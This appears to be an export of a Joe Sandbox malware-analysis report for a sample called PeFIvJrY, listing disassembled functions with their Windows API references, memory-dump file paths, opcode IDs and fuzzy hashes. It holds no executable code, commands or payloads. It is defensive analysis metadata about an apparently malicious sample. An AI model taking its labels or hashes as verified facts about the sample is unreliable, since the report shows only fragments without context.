                                Function 00425626 Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,00424B1E,?,?,?,?,00424B53,A05DD77D,?,?,?,?,?,0042463E,0043BB75,00000001), ref: 0042563F
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00424B1E,?,?,?,?,00424B53,A05DD77D,?,?,?,?,?,0042463E), ref: 00425643
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Time$FileSystem$Precise
                                • String ID:
                                • API String ID: 743729956-0
                                • Opcode ID: 15977bd66e7dbdc32aede047bad92e3bde5b96873450a8914fb1cc3cae41b53c
                                • Instruction ID: 6fb57fc9440cc16266d1a9460a27507f428bfc13e8641e9bc812ff6101ce1af3
                                • Opcode Fuzzy Hash: 15977bd66e7dbdc32aede047bad92e3bde5b96873450a8914fb1cc3cae41b53c
                                • Instruction Fuzzy Hash: 34D02232B00A38D78B122F90FC045AD7F18FA4AB6238C0036FA0947220CBB21C104BDE
                                Function 00419D00 Relevance: 2.1, Strings: 1, Instructions: 857COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]uA
                                • API String ID: 0-3367409732
                                • Opcode ID: 535fe90985ea1ed41850480731cc03712c4a3a17051fdf9307385f7c098b2fe5
                                • Instruction ID: d791682f568accd8d46cc3015fb0f821abe5dad6c06d3b5f7eb865ecaed707df
                                • Opcode Fuzzy Hash: 535fe90985ea1ed41850480731cc03712c4a3a17051fdf9307385f7c098b2fe5
                                • Instruction Fuzzy Hash: 4B727E74E052059FDB18CF69C4506EABBF2BF58300F18825BD846EB351E73899D2CB99
                                Function 0040B360 Relevance: 2.0, APIs: 1, Instructions: 542COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID:
                                • API String ID: 1302938615-0
                                • Opcode ID: c84c5cd9668583c77f5f46140b28a9ca25975e1d128ad5f0d9ee327595e19082
                                • Instruction ID: 302f7963b6ffb2a0121c66963e2d399897cc8ab08f8f879f79e7ffb8e7703690
                                • Opcode Fuzzy Hash: c84c5cd9668583c77f5f46140b28a9ca25975e1d128ad5f0d9ee327595e19082
                                • Instruction Fuzzy Hash: D1220B28E192C18FC70A9B7D95501ACFFB2DB5B20072881BFD9D5D7363C6348A4AC769
                                Function 0043901B Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00439016,?,?,00000008,?,?,00438C20,00000000), ref: 00439248
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 320e0a44221bb08c13791a964f315cf3d23cebd4edfca91fc28c346566873fe1
                                • Instruction ID: d524b35ccba0a8371b8ac89635f1baa2330d78886d1d1fb6d1fd286d82769cc8
                                • Opcode Fuzzy Hash: 320e0a44221bb08c13791a964f315cf3d23cebd4edfca91fc28c346566873fe1
                                • Instruction Fuzzy Hash: 56B16F35610605DFEB14CF28C48AB567BA0FF09364F259699E89ACF3A1C379ED42CB44
                                Function 004191B0 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]uA
                                • API String ID: 0-3367409732
                                • Opcode ID: bbf274435d54361ad22059b2d439a5fc3973483437367c667e9d2e5034b80913
                                • Instruction ID: 504e5fb12da2a8a749ab313f64fc292f86d71b50c631b6d9b7c66a2c412de158
                                • Opcode Fuzzy Hash: bbf274435d54361ad22059b2d439a5fc3973483437367c667e9d2e5034b80913
                                • Instruction Fuzzy Hash: 79125170E006099FCB08CF69C4906E9B7F2BF58314F24826ED416A7745E739E996CF98
                                Function 0042622C Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00426242
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: 3a0652957b94c65751ecaa035cc8ade31b91b0f146b4116cda52428a2f496f1e
                                • Instruction ID: 7b016f5ca3908a463cb7123c52cdb2a794a8838f1a5dc7a156c89709ba8e5cd8
                                • Opcode Fuzzy Hash: 3a0652957b94c65751ecaa035cc8ade31b91b0f146b4116cda52428a2f496f1e
                                • Instruction Fuzzy Hash: 705181B1A002158BDB18CF99E9816ABBBF0FB45314F25857ED805E7351E3B99900CF69
                                Function 0042CAED Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: c1de0305faece5705f446036fedc47572cdb626cf013c5b27a2252d9c2f40ff0
                                • Instruction ID: 0a2ae5f7ae8fa281ffed41ecf2e6ec4e3655c5d9ffb253552512ca14627cd468
                                • Opcode Fuzzy Hash: c1de0305faece5705f446036fedc47572cdb626cf013c5b27a2252d9c2f40ff0
                                • Instruction Fuzzy Hash: B9E1AD70B006258FCB24CF28E5C1A6EBBB1FF45314BA4465FD45A9B390D738AD42CB5A
                                Function 0043303C Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7ab4a2839f2287baed125f36495a183e79032d5ab567039cb894208fea70c7fb
                                • Instruction ID: 7ddea0066d226893fbf7024c1d85fae41141ccd341a64ad5b04c447128be1602
                                • Opcode Fuzzy Hash: 7ab4a2839f2287baed125f36495a183e79032d5ab567039cb894208fea70c7fb
                                • Instruction Fuzzy Hash: 0F313472900219AFDB24DFB9CC88DBBB77DEB88314F14419AF905D7244EA34EE408B58
                                Function 0042C75F Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 2abe8b27b6dea7b2167edaa51354998dd9750d324749d5c5d7909ba605f66502
                                • Instruction ID: 71d7cc87f99a5dd2ecb6189b62105c1d2700c14eb1c6d507e7ecab27e8983a78
                                • Opcode Fuzzy Hash: 2abe8b27b6dea7b2167edaa51354998dd9750d324749d5c5d7909ba605f66502
                                • Instruction Fuzzy Hash: 44C1FF70B0066A8FCB24DF28E4D076FB7A2AF45314FA4861FD45297391C738AD46CB59
                                Function 00406090 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 4767ca6bbdd4f35b0fa63db399399c87933254b465a6464eb5f06548f33a2a6d
                                • Instruction ID: 75fc5f5100c78b8a637556c6567d15d84167fb611d7d5bb37f9eb5198634761e
                                • Opcode Fuzzy Hash: 4767ca6bbdd4f35b0fa63db399399c87933254b465a6464eb5f06548f33a2a6d
                                • Instruction Fuzzy Hash: 8301D831A48258DFD714CF58D805B6677A8EB09724F1441BFE806D77D0D77B9800CB88
                                Function 00426796 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_000467A2,00425F2C), ref: 0042679B
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: e69b9b65f8d4e5cc382fad9bed4a507efbd0fc2b7a21ecde5a811c37a3374345
                                • Instruction ID: 7813b96c9b8250002290ed029b89396380b4a2f092ac0b8a175b413754be6ba7
                                • Opcode Fuzzy Hash: e69b9b65f8d4e5cc382fad9bed4a507efbd0fc2b7a21ecde5a811c37a3374345
                                • Instruction Fuzzy Hash:
                                Function 004135B0 Relevance: .5, Instructions: 544COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b1a13c1892399e18cc966883bfb29ece94d7e33c837d020d71dac5e4680327e7
                                • Instruction ID: 22a4fb71f38837b87259d9891ee338f803d896cf0a7ead4750b7a462887ce9f9
                                • Opcode Fuzzy Hash: b1a13c1892399e18cc966883bfb29ece94d7e33c837d020d71dac5e4680327e7
                                • Instruction Fuzzy Hash: 5812E3B1A006058FCB24DF29D4816AAF3F1FF88315B14853FD85A97741EB39E985CB98
                                Function 0041A700 Relevance: .5, Instructions: 524COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a82505fcde4dbd2dbbd0442f6c8146852b5a0def08571afe8ebd44a05a29bd68
                                • Instruction ID: 427c2c7934747a0677643f3068afec50e332ed7de267e0e9b830e2a353e78cb6
                                • Opcode Fuzzy Hash: a82505fcde4dbd2dbbd0442f6c8146852b5a0def08571afe8ebd44a05a29bd68
                                • Instruction Fuzzy Hash: DA124E71A016069FC724DF29C8409AAF7F6AF54304724CA3ED4AAC3B41E735F995CB86
                                Function 06301430 Relevance: .5, Instructions: 522COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1968064b506e494423fcef45e5640b402f3070c958a2950d49b1f4cb0382a17e
                                • Instruction ID: 675094e9660efa9a98960d77a209a0dd34ffb7b017aa6bee8768756af268b813
                                • Opcode Fuzzy Hash: 1968064b506e494423fcef45e5640b402f3070c958a2950d49b1f4cb0382a17e
                                • Instruction Fuzzy Hash: 09527FB0500709EFE728EF54E8C8199BBB6FB6A324F904209C5515F2D8E77464EACF64
                                Function 0040BAF0 Relevance: .3, Instructions: 289COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f7dd7546770ff8a512fd19ffc8ea56c155ee7232813058fd4dc4a6fe069dda5
                                • Instruction ID: 3142676c601db73ebec77ea21c3e24af1b70b8e5947ec64bfd245a756a65a018
                                • Opcode Fuzzy Hash: 5f7dd7546770ff8a512fd19ffc8ea56c155ee7232813058fd4dc4a6fe069dda5
                                • Instruction Fuzzy Hash: 6DB15E71E002098BDF08CF69D9916ADF7B2EF98310F24453AE516EB391D738AD418B99
                                Function 063005A8 Relevance: .3, Instructions: 260COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c77898385efcf6684f0311d55232716ecfeb99ae6f7515f36adfaaf05c50d6e
                                • Instruction ID: a896b453a06fe0ebfb0ff21b3ac230d2cb278685e6d8c9092e50e84447ae0ccf
                                • Opcode Fuzzy Hash: 9c77898385efcf6684f0311d55232716ecfeb99ae6f7515f36adfaaf05c50d6e
                                • Instruction Fuzzy Hash: 77A1A232E00219CFDF59DFB4C850ADEB7B2FF88300B15416AE915AB265DB31E959CB90
                                Function 00418150 Relevance: .2, Instructions: 168COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5cd17d35d063025fee93bdc2b3cec45270f634cba21f955d7a87546b98de82ab
                                • Instruction ID: 923497440c90c77f1fda99b905b6a301c334bb4dcece4e915174540f2bd3e9fc
                                • Opcode Fuzzy Hash: 5cd17d35d063025fee93bdc2b3cec45270f634cba21f955d7a87546b98de82ab
                                • Instruction Fuzzy Hash: 34516436E006199BCB15CEA9C4806EFF7B1BF99310F1483ABD855A7345DB38ACC18B94
                                Function 06325D0F Relevance: .1, Instructions: 127COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b9d18c64b5ced81f48a37d20f8c2b6d349d9f4b52c122071389d820f4c52bb5
                                • Instruction ID: 64fe59029e1cf3b3cff5ff3298a445e1d810181f93f4cd731a6be316aa00d423
                                • Opcode Fuzzy Hash: 1b9d18c64b5ced81f48a37d20f8c2b6d349d9f4b52c122071389d820f4c52bb5
